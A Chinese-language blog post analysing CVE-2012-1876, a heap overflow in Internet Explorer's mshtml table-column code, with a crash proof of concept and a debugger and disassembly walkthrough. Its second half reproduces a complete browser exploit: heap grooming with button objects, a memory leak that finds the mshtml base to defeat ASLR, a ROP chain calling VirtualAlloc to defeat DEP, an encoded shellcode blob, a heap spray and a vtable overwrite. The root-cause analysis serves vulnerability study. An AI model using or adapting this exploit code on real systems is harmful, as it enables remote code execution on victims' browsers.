zoukankan      html  css  js  c++  java
  • CVE_2012_1876堆溢出分析

      首先用windbg附加进程ie页面内容进程,!gflag +hpa添加堆尾检查,.childdbg 1允许子进程调试,然后加载POC。

    POC:

    <html>
     <body>
     <table style="table-layout:fixed" >
            <col id="132" width="41" span="1" >&nbsp </col>
     </table>
     <script>
     
     function over_trigger() {
            var obj_col = document.getElementById("132");
            obj_col.width = "42765";
            obj_col.span = 1000;
     }
     
     setTimeout("over_trigger();",1);
     </script>
     </body>
     </html>

      附加后断在这个位置,可以看到这里由于[EDI]内容不可写已经导致崩溃,下面我们分析一下什么地方导致的[EDI]不可写。

      在这个位置栈回溯

      首先从mshtml!CTableColCalc::AdjustForCol开始分析,uf mshtml!CTableColCalc::AdjustForCol

    1:022> uf mshtml!CTableColCalc::AdjustForCol
    mshtml!CTableColCalc::AdjustForCol:
    67ebf152 8bff            mov     edi,edi
    67ebf154 55              push    ebp
    67ebf155 8bec            mov     ebp,esp
    67ebf157 8b08            mov     ecx,dword ptr [eax]
    67ebf159 53              push    ebx
    67ebf15a 8b5d08          mov     ebx,dword ptr [ebp+8]
    67ebf15d 57              push    edi
    67ebf15e 8bc1            mov     eax,ecx
    67ebf160 83e00f          and     eax,0Fh
    67ebf163 8d7e18          lea     edi,[esi+18h]        //这里对edi赋值了
    …以下无用代码省略

      反汇编可以看到mshtml!CTableColCalc::AdjustForCol这个函数只有67ebf163这里对edi进行了赋值,但是mshtml!CTableColCalc::AdjustForCol在对edi赋值之前并没有对esi进行过赋值,所以继续反汇编上层函数mshtml!CTableLayout::CalculateMinMax

      这里我们在IDA里加载符号表分析一下CTableLayout::CalculateMinMax这个函数

    .text:74D3018A                 mov     edi, edi    //巨硬为了INLINE HOOK时方便函数前五字节覆盖做的优化
    .text:74D3018C                 push    ebp
    .text:74D3018D                 mov     ebp, esp
    .text:74D3018F                 sub     esp, 90h    //开辟栈帧
    .text:74D30195                 push    ebx        //栈回溯上层函数,tagSIZE *
    .text:74D30196                 mov     ebx, [ebp+arg_0]        //ebx=参数1=CTableLayout
    .text:74D30199                 push    esi            //栈回溯上层函数,CTableCalcInfo *
    .text:74D3019A                 mov     esi, [ebp+arg_4]        //esi=参数2
    .text:74D3019D                 mov     eax, [esi+28h]
    .text:74D301A0                 mov     [ebp+var_8C], eax
    .text:74D301A6                 mov     eax, [ebx+54h]        //eax=span属性的和
    .text:74D301A9                 mov     [ebp+arg_0], eax
    …省略无用代码
    .text:74D30293 loc_74D30293:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+105↑j
    .text:74D30293                 mov     edx, [ebp+arg_0]        //edx=span属性的和
    .text:74D30296                 mov     eax, edx
    .text:74D30298                 sub     eax, ecx
    .text:74D3029A                 mov     [ebp+var_1C], eax
    .text:74D3029D                 push    0
    .text:74D3029F                 pop     eax
    .text:74D302A0                 setz    al
    .text:74D302A3                 mov     [ebx+50h], ecx
    .text:74D302A6                 shl     eax, 8
    .text:74D302A9                 xor     eax, [ebx+44h]
    .text:74D302AC                 and     eax, 100h
    .text:74D302B1                 xor     [ebx+44h], eax
    .text:74D302B4                 test    byte ptr [esi+2Ch], 1
    .text:74D302B8                 jnz     loc_74C5EE4D
    .text:74D302BE
    .text:74D302BE loc_74D302BE:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)-D133B↑j
    .text:74D302BE                 xor     eax, eax
    .text:74D302C0
    .text:74D302C0 loc_74D302C0:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1957B9↓j
    .text:74D302C0                 or      [ebp+var_38], eax
    .text:74D302C3                 cmp     [ebp+nDenominator], edi
    .text:74D302C6                 jnz     loc_74EC5948
    .text:74D302CC                 mov     eax, [ebx+94h]    //eax=CTableLayout+94H,记为spancmp
    .text:74D302D2                 shr     eax, 2            //eax>>2
    .text:74D302D5                 cmp     eax, edx        //edx=span属性的和,记为spansum
    .text:74D302D7                 jge     short loc_74D30312
    .text:74D302D9                 cmp     edx, edi
    .text:74D302DB                 lea     esi, [ebx+90h]
    .text:74D302E1                 jl      loc_74C2CE82
    .text:74D302E7                 cmp     edx, [esi+8]
    .text:74D302EA                 jbe     short loc_74D302FF
    .text:74D302EC                 push    1Ch             ; Size
    .text:74D302EE                 mov     eax, edx
    .text:74D302F0                 mov     edi, esi
    .text:74D302F2        call    ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z ; CImplAry::EnsureSizeWorker(uint,long)                        //跟进这个函数发现在这里开辟堆空间
    
    .text:74DF8FB7                 mov     edi, edi
    .text:74DF8FB9                 push    ebp
    .text:74DF8FBA                 mov     ebp, esp
    .text:74DF8FBC                 push    ecx
    .text:74DF8FBD                 push    ecx
    .text:74DF8FBE                 push    ebx
    .text:74DF8FBF                 push    esi
    .text:74DF8FC0                 mov     esi, eax
    .text:74DF8FC2                 push    4
    .text:74DF8FC4                 pop     eax
    .text:74DF8FC5                 mov     [ebp+var_4], eax
    .text:74DF8FC8                 cmp     esi, eax
    .text:74DF8FCA                 jnb     loc_74E02CB4
    .text:74DF8FD0
    .text:74DF8FD0 loc_74DF8FD0:                           ; CODE XREF: CImplAry::EnsureSizeWorker(uint,long)+9D00↓j
    .text:74DF8FD0                                         ; CImplAry::EnsureSizeWorker(uint,long)+9D25↓j ...
    .text:74DF8FD0                 mov     eax, [ebp+var_4]        //eax=4
    .text:74DF8FD3                 mul     [ebp+Size]            //Size*4,Size至少0X1C
    .text:74DF8FD6                 push    edx
    .text:74DF8FD7                 push    eax
    .text:74DF8FD8                 lea     eax, [ebp+dwBytes]
    .text:74DF8FDB                 call    ?ULongLongToUInt@@YGJ_KPAI@Z ; ULongLongToUInt(unsigned __int64,uint *)
    .text:74DF8FE0                 mov     ebx, eax
    .text:74DF8FE2                 test    ebx, ebx
    .text:74DF8FE4                 jnz     short loc_74DF900B
    .text:74DF8FE6                 test    byte ptr [edi+4], 2
    .text:74DF8FEA                 jnz     loc_74E3BEEC
    .text:74DF8FF0                 push    [ebp+dwBytes]   ; dwBytes
    .text:74DF8FF3                 lea     esi, [edi+0Ch]        //esi=CTableLayout+0x90+0xC,HeapRealloc返回的地址,记为vulheap
    .text:74DF8FF6                 call    ?_HeapRealloc@@YGJPAPAXI@Z ; _HeapRealloc(void * *,uint)
    
    上面代码段的逻辑是(spancmp>>2)<spansum则开辟漏洞堆空间,漏洞堆空间的地址保存在CTableLayout+0x90+0xc
    
    .text:74EC5AB0                 push    0
    .text:74EC5AB2                 push    esi
    .text:74EC5AB3                 call    ?GetPixelWidth@CWidthUnitValue@@QBEHPBVCDocInfo@@PAVCElement@@H@Z ; CWidthUnitValue::GetPixelWidth(CDocInfo const *,CElement *,int)
    .text:74EC5AB8                 cmp     [ebp+var_5C], 0
    .text:74EC5ABC                 mov     [ebp+var_2C], eax    //copydata=width*100
    …省略无用代码
    .text:74EC5B3E                 mov     eax, [ebp+nDenominator]        //span=1000
    .text:74EC5B41                 imul    ecx, 1Ch    
    .text:74EC5B44                 add     [ebp+var_38], eax
    .text:74EC5B47                 mov     [ebp+var_20], ecx
    .text:74EC5B4A                 jmp     short loc_74EC5B4F
    .text:74EC5B4C ; ---------------------------------------------------------------------------
    .text:74EC5B4C
    .text:74EC5B4C loc_74EC5B4C:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+195A11↓j
    .text:74EC5B4C                 mov     ecx, [ebp+var_20]
    .text:74EC5B4F
    .text:74EC5B4F loc_74EC5B4F:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959C0↑j
    .text:74EC5B4F                 mov     eax, [ebx+9Ch]        //eax=vulheap
    .text:74EC5B55                 add     eax, ecx        //eax=vulheap+span*0x1c
    .text:74EC5B57                 cmp     [ebp+var_1C], 0
    .text:74EC5B5B                 mov     [ebp+var_24], eax
    .text:74EC5B5E                 jz      short loc_74EC5B7A
    .text:74EC5B60                 mov     eax, [ebp+nDenominator]
    .text:74EC5B63                 cmp     eax, 1
    .text:74EC5B66                 jle     short loc_74EC5B7A
    .text:74EC5B68                 dec     eax
    .text:74EC5B69                 cmp     [ebp+var_14], eax
    .text:74EC5B6C                 jnz     short loc_74EC5B7A
    .text:74EC5B6E                 imul    eax, [ebp+var_C]
    .text:74EC5B72                 mov     ecx, [ebp+var_2C]    //ecx=copydata
    .text:74EC5B75                 sub     ecx, eax
    .text:74EC5B77                 mov     [ebp+var_C], ecx        //[ebp-c]=span*0x1c
    .text:74EC5B7A
    .text:74EC5B7A loc_74EC5B7A:                           ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959D4↑j
    .text:74EC5B7A                                         ; CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959DC↑j ...
    .text:74EC5B7A                 push    [ebp+var_3C]
    .text:74EC5B7D                 mov     eax, [ebp+var_34]
    .text:74EC5B80                 push    [ebp+arg_4]
    .text:74EC5B83                 mov     esi, [ebp+var_24]    
    .text:74EC5B86                 push    [ebp+var_C]            //copydata
    .text:74EC5B89                 call    ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)

      这里我们继续查看一下AdjustForCol这个函数

      这里以EAX的内容按位与0xF的结果作为循环次数,依次把CWidthUnitValue *a4的内容复制到esi,最终导致溢出。

     

    这几天心态有点崩,VUPEN的EXP详细分析先放着吧,需要绕过ASLR和DEP。大致思路是利用堆溢出读取CButtonLayout的虚表指针,这个虚表指针和漏洞DLL的偏移是一个固定值,所以这样可以绕过ASLR(至于CButtonLayout本身处于堆空间,也受ASLR影响,我们可以得到这个指针值的原因是CButtonLayout位于Vulheap的固定偏移处,这个偏移量是0X300+8*3+4,即3个0X100的堆块+3个块首大小+4字节虚表指针)。DEP的绕过是构造一个ROP调用VirtualProtect修改内存属性。然后再通过堆喷射把ROP链和SHELLCODE喷射到可预测地址。

    关于里边详细的原理等变强了有时间再补吧。。

    深深的感慨漏洞利用的艺术,学无止境,现在真的还太菜

            <html>
            <body>
            <div id="test"></div>
            <script language='javascript'>
                    
            var leak_index = -1;
    
            var dap = "EEEE";
            while ( dap.length < 480 ) dap += dap;
    
            var padding = "AAAA";
            while ( padding.length < 480 ) padding += padding;
    
            var filler = "BBBB";
            while ( filler.length < 480 ) filler += filler;
    
            //spray
            var arr = new Array();
            var rra = new Array();
    
            var div_container = document.getElementById("test");
            div_container.style.cssText = "display:none";
    
            for (var i=0; i < 500; i+=2) {
    
                // E
                rra[i] = dap.substring(0, (0x100-6)/2);
    
                // S, bstr = A
                arr[i] = padding.substring(0, (0x100-6)/2);
    
                // A, bstr = B
                arr[i+1] = filler.substring(0, (0x100-6)/2);
    
                // B
                var obj = document.createElement("button");
                div_container.appendChild(obj);
    
            }
    
            for (var i=200; i<500; i+=2 ) {
                rra[i] = null;
                CollectGarbage();
            }
    
            </script>
            <table style="table-layout:fixed" ><col id="0" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="1" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="2" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="3" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="4" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="5" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="6" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="7" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="8" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="9" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="10" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="11" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="12" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="13" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="14" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="15" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="16" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="17" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="18" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="19" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="20" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="21" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="22" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="23" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="24" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="25" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="26" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="27" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="28" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="29" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="30" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="31" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="32" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="33" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="34" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="35" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="36" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="37" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="38" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="39" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="40" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="41" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="42" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="43" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="44" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="45" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="46" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="47" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="48" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="49" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="50" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="51" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="52" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="53" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="54" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="55" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="56" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="57" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="58" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="59" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="60" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="61" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="62" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="63" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="64" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="65" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="66" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="67" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="68" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="69" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="70" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="71" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="72" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="73" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="74" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="75" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="76" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="77" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="78" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="79" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="80" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="81" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="82" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="83" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="84" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="85" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="86" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="87" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="88" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="89" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="90" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="91" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="92" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="93" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="94" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="95" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="96" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="97" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="98" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="99" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="100" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="101" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="102" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="103" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="104" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="105" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="106" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="107" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="108" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="109" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="110" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="111" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="112" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="113" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="114" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="115" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="116" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="117" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="118" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="119" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="120" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="121" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="122" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="123" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="124" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="125" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="126" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="127" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="128" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="129" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="130" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="131" width="41" span="9" >&nbsp </col></table><table style="table-layout:fixed" ><col id="132" width="41" span="9" >&nbsp </col></table>
            
            <script language='javascript'>
                var obj_col = document.getElementById("132");
                obj_col.span = 19;
        
            function over_trigger() {
                var leak_addr = -1;
                for ( var i = 0; i < 500; i++ ) {
                    if ( arr[i].length > (0x100-6)/2 ) { // overflowed
                        leak_index = i;
                        var leak = arr[i].substring((0x100-6)/2+(2+8)/2, (0x100-6)/2+(2+8+4)/2);
                        leak_addr = parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 );
                        mshtmlbase = leak_addr - Number(0x001582b8);
                        alert(mshtmlbase);
                        break;
                    }
                }
                if ( leak_addr == -1 || leak_index == -1 ) { alert("memory leak failed...."); }
            //return mshtmlbase;
            }
    
        // A very special heap spray
        function heap_spray(){
               CollectGarbage();
            var heapobj = new Object();
        
            // generated with mona.py (mshtml.dll v)
                function rop_chain(mshtmlbase){
                    var arr = [
                    mshtmlbase + Number(0x00001031),
                    mshtmlbase + Number(0x00002c78),    // pop ebp; retn
                    mshtmlbase + Number(0x0001b4e3),    // xchg eax,esp; retn (pivot)
                    mshtmlbase + Number(0x00352c8b),    // pop eax; retn
                    mshtmlbase + Number(0x00001340),    // ptr to &VirtualAlloc() [IAT]
                    mshtmlbase + Number(0x00124ade),    // mov eax,[eax]; retn
                    mshtmlbase + Number(0x000af93e),    // xchg eax,esi; and al,0; xor eax,eax; retn
                    mshtmlbase + Number(0x00455a9c),    // pop ebp; retn
                    mshtmlbase + Number(0x00128b8d),    // & jmp esp
                    mshtmlbase + Number(0x00061436),    // pop ebx; retn
                    0x00000001,                       // 0x00000001-> ebx
                    mshtmlbase + Number(0x0052d8a3),    // pop edx; retn
                    0x00001000,                       // 0x00001000-> edx
                    mshtmlbase + Number(0x00003670),    // pop ecx; retn
                    0x00000040,                       // 0x00000040-> ecx
                    mshtmlbase + Number(0x001d263d),    // pop edi; retn
                    mshtmlbase + Number(0x000032ac),    // retn
                    mshtmlbase + Number(0x00352c9f),    // pop eax; retn
                    0x90909090,                       // nop
                    mshtmlbase + Number(0x0052e805),    // pushad; retn
                    0x90909090,
                    0x90909090,
                    0x90909090,
                    0x90909090,
                    0x90909090,
                        ];
                    return arr;
                }
    
            function d2u(dword){
                var uni = String.fromCharCode(dword & 0xFFFF);
                uni += String.fromCharCode(dword>>16);
                return uni;
            }
    
            function tab2uni(heapobj, tab){
                var uni = ""
                for(var i=0;i<tab.length;i++){
                    uni += heapobj.d2u(tab[i]);
                }
                return uni;
            }
            
            heapobj.tab2uni = tab2uni;
            heapobj.d2u = d2u;
            heapobj.rop_chain = rop_chain;
    
            var code = unescape("%u40b0%u414b%u1d24%ub4a8%u7799%ube37%ua947%ud41a%u353f%ueb30%ud133%u2ae1%u31e0%ue2d3%u1514%ufd13%u3497%u7a7b%ufc39%u92ba%u9390%u0a4e%ubbf5%u8db2%ue385%uf823%ud53a%u0448%u750d%ud632%u707c%u4642%u7e78%ub12c%u2f98%u1c3c%u727e%u3b7b%u4fe0%ue38c%u4f76%u81b0%u2de2%u35ba%u86bb%u67f8%u8d0c%u9190%u7574%u7f71%u7d3c%u9f15%ub347%ud50b%u784e%u4970%u1b37%uc1ff%uc6fe%uc0c7%ub6d4%u9246%ub4b1%uf588%ua91d%u7c4b%u2548%u7a99%u9b3d%u01b7%u34eb%u1cb5%u38a8%ub8fc%ud609%ube4a%u9714%ue121%ub904%u42b2%u7796%u6924%u80f9%u0dfd%u412c%u2f05%u273f%ubf40%u9893%u7343%u6679%u77a8%ub63f%u7472%u707b%u843d%uebd2%uf630%ubfd5%u71b2%u757a%u1848%u0cf5%u96b7%uf889%u764a%u9b2d%u92b0%u66be%u7d97%ub425%u9114%u4904%uba34%u421c%ue308%uf902%u4140%u4773%u0d27%u93b5%u2299%u1dd4%u7c4f%u2867%u98fc%u2c24%ue212%ufd03%u78a9%u3505%u8390%u2fe0%u4337%u154b%u468d%u79b9%u297f%ubbd6%u197e%u4ee1%u9fb8%ub1b3%u4a3c%u7a7d%u7679%u4670%u2091%u74e1%ub043%u4e71%ub590%u75b7%u983c%u4bb3%ud687%uf86b%u9b40%u117f%ud1f7%u7bf9%u152f%u3427%u1d92%u3d97%u2d49%u720d%u014f%u7ce0%u3105%u10eb%u35f5%ub4b6%u1c2c%u93b2%u4704%ud52b%ubbb1%ue389%u4137%u7e78%u733f%u7742%u2925%ufcd0%u6624%u8dba%u67b9%u1a96%ua8fd%ua9be%ud40b%u4899%u9f14%u87bf%ue2f7%ub80c%u903d%u14b0%u25bb%u7d96%u1a7f%u79f5%uf809%u347c%u7b91%u4e47%ueb81%ue122%ud41b%u7074%ub21d%u2d72%u928d%ub3b1%ua905%u71b4%u4b0c%u9343%u0d76%u989f%u84b5%ub7d5%u4666%ube40%ub8bf%u201c%u48e2%u4a73%u6b2c%u2afc%u04e0%u4941%u3777%u10ba%u7ed6%u332f%ub9fd%u7a9b%u7875%u2415%u1299%uf9d2%u3f97%ub63c%u3567%u27a8%ue386%u7742%u4f73%ue380%ua93c%u757c%uf62b%ud0c0%u27e0%u214b%ue1d3%ub93f%u157d%u8c14%ue2c1%u9904%u7498%u7071%u6637%ueb28%u4e1c%u7fb6%u357b%u3297%u25d4%uf569%u9105%u4047%u0224%u78d6%u7941%uba3d%u49b1%u7276%u1d2f%u85bf%u67fc%u7e92%u4a2c%u7ab4%u1348%u93d5%u8d9b%u03bb%u74fd%u0879%u43e1%ue083%u1873%u46e3%u2372%ub2f8%u88b0%ub8f9%u969f%u75b5%u770c%u7b42%ub72d%u7aa8%ue219%ueb38%ub334%u90be%u4f7e%u0d7f%ub3b6%u3076%ubff5%u479f%u7167%ud40a%u3b7c%u66fc%u41b7%u9615%u3dfd%u3505%ub825%u1c7d%ub54a%u3940%u37d6%u3f92%u971d%u1478%u8d49%ua8b2%u3493%u2c3c%u902f%ud54f%u04a9%u1198%u91f8%ub99b%u9943%ubbb1%u0d70%u4824%u4b0c%ube4e%ub02d%uf93a%u27ba%ub446%udb42%ud9d1%u2474%u5af4%uc929%u49b1%u8cbe%uc04a%u31a0%u1972%uc283%u0304%u1572%ubf6e%u483c%u40e7%u89bd%uc997%ub858%uae85%ue929%ua419%u027c%ue8d2%u9194%u2496%u129a%u131c%ua395%u9b91%u6779%u67b0%ub480%u5912%uc94b%u9e53%u22b6%u7701%u91bc%ufcb5%u2980%ud2b4%u128e%u57ce%ue650%u5964%u5781%u11f3%ud339%u825b%u3038%ufeb8%u3d73%u740a%u9782%u7543%ud7b4%u480f%uda78%u8c4e%u05bf%ue625%ub8c3%u3d3d%u66b9%ua0c8%uec19%u016a%u219b%uc2ec%u8e97%u8c7b%u11bb%ua6a8%u9ac0%u694f%ud841%uad6b%uba09%uf412%u6df7%ue62b%ud150%u6c89%u0672%u2eab%ueb1b%ud081%u63db%ua392%u2ce9%u2c08%ua442%uab96%u9fa5%u236e%u2058%u6d8e%u749f%u05de%uf536%ud5b5%u20b7%u8619%u9b17%u76d9%u4bd8%u9cb1%ub4d7%u9ea1%udd3d%u644b%u22d6%u6723%ucb43%u6831%u579a%u8ebc%u77f6%u19e8%ue16f%ud2b1%uee0e%u9f6c%u6411%u5f82%u8ddf%u73ef%u7d88%u2eba%u811f%u4411%u17a0%ucf9d%u8ff7%u369f%u103f%u1d60%u994b%udef4%ue624%udf18%ub0b4%udf72%u64dc%u8c26%u6af9%ua0f3%uff51%u90fb%ua806%u1e93%u9e70%ue03c%u1e57%u3701%ua49e%u3d73%u64f2");
            var rop_chain = heapobj.tab2uni(heapobj, heapobj.rop_chain(mshtmlbase)) ;
            var shellcode = rop_chain + code
    
            while (shellcode.length < 100000)
            shellcode = shellcode + shellcode;
            var onemeg = shellcode.substr(0, 64*1024/2);
            for (i=0; i<14; i++) {
            onemeg += shellcode.substr(0, 64*1024/2);
            }
    
            onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
            var spray = new Array();
    
            for (i=0; i<400; i++) {
            spray[i] = onemeg.substr(0, onemeg.length);
            }
        }
    
        function smash_vtable(){
                var obj_col_0 = document.getElementById("132");
                obj_col_0.width = "1178993";                    // smash the vftable 0x07070024
                obj_col_0.span = "44";                      // the amount to overwrite
        }
    
        var mshtmlbase = "";
        setTimeout("over_trigger();",1);    
        setTimeout("heap_spray();",400);
        setTimeout("smash_vtable();",700);
    
            </script>
            </body>
            </html>
  • 相关阅读:
    实现简单HttpServer案例
    实现简单Mybatis案例
    python 判断文件和文件夹是否存在的方法 和一些文件常用操作符
    常用模块学习
    python格式化输出
    ubuntu 配置vim编辑器
    linux 安装python3.x
    python属性限制 __slots__
    选课系统作业
    通过sorted获取dict的所有key值或者value值
  • 原文地址:https://www.cnblogs.com/snip3r/p/9677546.html
Copyright © 2011-2022 走看看